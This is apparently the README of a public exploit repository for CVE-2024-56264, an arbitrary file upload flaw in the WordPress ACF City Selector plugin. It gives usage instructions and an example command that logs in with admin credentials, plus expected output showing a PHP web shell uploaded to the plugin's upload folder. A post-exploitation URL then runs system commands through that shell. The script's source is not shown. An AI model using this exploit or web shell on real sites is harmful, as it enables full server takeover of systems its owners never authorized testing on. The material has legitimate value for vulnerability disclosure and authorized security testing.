# CVE-2024-56264

## WordPress ACF City Selector - Arbitrary File Upload Exploit (CVE-2024-56264)

### Overview
This repository contains an exploit for **CVE-2024-56264**, which is an **Arbitrary File Upload** vulnerability found in the WordPress **ACF City Selector** plugin (versions **<= 1.14.0**). This vulnerability allows an attacker to upload a **malicious PHP file (web shell)** to a vulnerable WordPress instance and execute arbitrary commands on the server.

### CVE Details
- **CVE ID:** CVE-2024-56264
- **Published Date:** January 2, 2025
- **Affected Plugin:** ACF City Selector
- **Vulnerable Versions:** `<= 1.14.0`
- **Impact:** Remote Code Execution (RCE) via unrestricted file upload

### Description
The ACF City Selector plugin fails to properly validate uploaded files, allowing attackers to **bypass restrictions** and upload **arbitrary PHP files**. Once a malicious PHP file is uploaded, an attacker can execute system commands remotely, leading to **full server compromise**.



## Requirements

### 📌 Dependencies
Ensure the following are installed before running the script:

- **Python 3.x**
- `requests` module (Install using: `pip install requests`)

You can install all required dependencies using:
```sh
pip install -r requirements.txt
```

## 🚀 Usage
Running the exploit:

```
usage: CVE-2024-56264.py [-h] --url URL --username USERNAME --password PASSWORD

WordPress ACF City Selector plugin <= 1.14.0 - Arbitrary File Upload vulnerability

options:
  -h, --help           show this help message and exit
  --url URL            Website base URL (e.g., http://192.168.100.74/wordpress)
  --username USERNAME  WordPress username
  --password PASSWORD  WordPress password

```
### Example:
```
python CVE-2024-56264.py --url http://192.168.100.74:888/wordpress --username admin --password admin
```
## Expected Output
Upon successful exploitation, you should see:
```
[+] Detected plugin version: 1.14.0
[+] Vulnerable version detected! Proceeding with exploitation.
[+] Logged in successfully.
[+] Extracted nonce: abc1234
[+] Shell uploaded successfully: http://wordpress/wp-content/uploads/acfcs/q.php
```


### Post-Exploitation
If successful, access the uploaded shell via:
```
http://wordpress/wp-content/uploads/acfcs/q.php?cmd=whoami
```
This allows remote command execution on the server.

## ⚠ Disclaimer
This script is intended **only for educational and authorized security testing purposes**. **Unauthorized use is illegal** and may result in severe consequences. The author is **not responsible** for any misuse of this exploit.
